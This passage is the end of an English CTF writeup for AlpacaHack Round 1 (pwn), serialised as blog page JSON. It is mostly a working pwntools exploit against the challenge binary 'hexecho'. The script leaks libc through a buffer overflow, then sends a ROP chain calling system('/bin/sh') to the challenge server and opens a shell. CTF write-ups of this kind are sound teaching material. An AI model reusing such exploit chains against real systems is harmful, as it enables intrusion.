<span class=\"token string\">\".\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"wsl.exe\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'-d'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"Ubuntu\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"bash\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"-c\"</span><span class=\"token punctuation\">]</span>\n\n<span class=\"token comment\"># Set gdb script</span>\ngdbscript <span class=\"token operator\">=</span> <span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"\nb *0x401321\ncontinue\n\"\"\"</span></span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./hexecho\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Run program</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">True</span>\nis_gdb <span class=\"token operator\">=</span> <span class=\"token boolean\">False</span>\n<span class=\"token keyword\">if</span> is_gdb<span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> gdb<span class=\"token punctuation\">.</span>debug<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">,</span> aslr<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">,</span> gdbscript<span class=\"token operator\">=</span>gdbscript<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">else</span><span class=\"token punctuation\">:</span>\n    target <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"34.170.146.252\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">29181</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">False</span><span class=\"token punctuation\">)</span>\n    <span class=\"token comment\"># target = process(TARGET_PATH)</span>\n\nrop_ret <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401370</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x118</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_ret\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401322</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x8</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x118</span><span class=\"token operator\">+</span><span class=\"token number\">8</span><span class=\"token operator\">+</span><span class=\"token number\">8</span><span class=\"token operator\">+</span><span class=\"token number\">8</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data (hex): \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">\"Received\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span>\n\nlibc_start_main_ret <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">[</span><span class=\"token number\">296</span><span class=\"token punctuation\">:</span><span class=\"token number\">296</span><span class=\"token operator\">+</span><span class=\"token number\">8</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_base <span class=\"token operator\">=</span> libc_start_main_ret <span class=\"token operator\">-</span> <span class=\"token number\">0x29d90</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>libc_start_main_ret<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n\n<span class=\"token comment\"># Stage 2</span>\nrop_str_bin_sh <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span>libc_base<span class=\"token operator\">+</span><span class=\"token number\">0x1d8678</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nrop_pop_rdi_ret <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span>libc_base<span class=\"token operator\">+</span><span class=\"token number\">0x1bbea1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nrop_system <span class=\"token operator\">=</span> <span class=\"token string\">\" \"</span><span class=\"token punctuation\">.</span>join<span class=\"token punctuation\">(</span><span class=\"token punctuation\">[</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>x<span class=\"token punctuation\">:</span><span class=\"token number\">0</span><span class=\"token punctuation\">{</span><span class=\"token number\">2</span><span class=\"token punctuation\">}</span>X<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span> <span class=\"token keyword\">for</span> x <span class=\"token keyword\">in</span> p64<span class=\"token punctuation\">(</span>libc_base<span class=\"token operator\">+</span><span class=\"token number\">0x50d70</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x118</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_ret\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_pop_rdi_ret\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_str_bin_sh\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\" \"</span>\npayload <span class=\"token operator\">+=</span> rop_system\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"+\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x30</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Size: \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span><span class=\"token builtin\">str</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x118</span> <span class=\"token operator\">+</span> <span class=\"token number\">0x30</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Data (hex): \"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I finally got around to writing this long-delayed writeup for AlpacaHack Round 1 (Pwn).</p>\n<p>I had planned to write up the remaining two challenges as well, but I ran out of energy, so for now I only covered these two.</p>","fields":{"slug":"/ctf-alpaca-round1-pwn-en","tagSlugs":["/tag/ctf-en/","/tag/pwn-en/","/tag/english/"]},"frontmatter":{"date":"2024-10-19","description":"Writeup for AlpacaHack Round 1 (Pwn) - Part 1.","tags":["CTF (en)","Pwn (en)","English"],"title":"AlpacaHack Round 1 (Pwn) Writeup - Part 1","socialImage":{"publicURL":"/static/8bb83cd7249ab55c8b578e956d2bd8a1/ctf-hitcon-ctf-2024-antivirus.png"}}}},"pageContext":{"slug":"/ctf-alpaca-round1-pwn-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}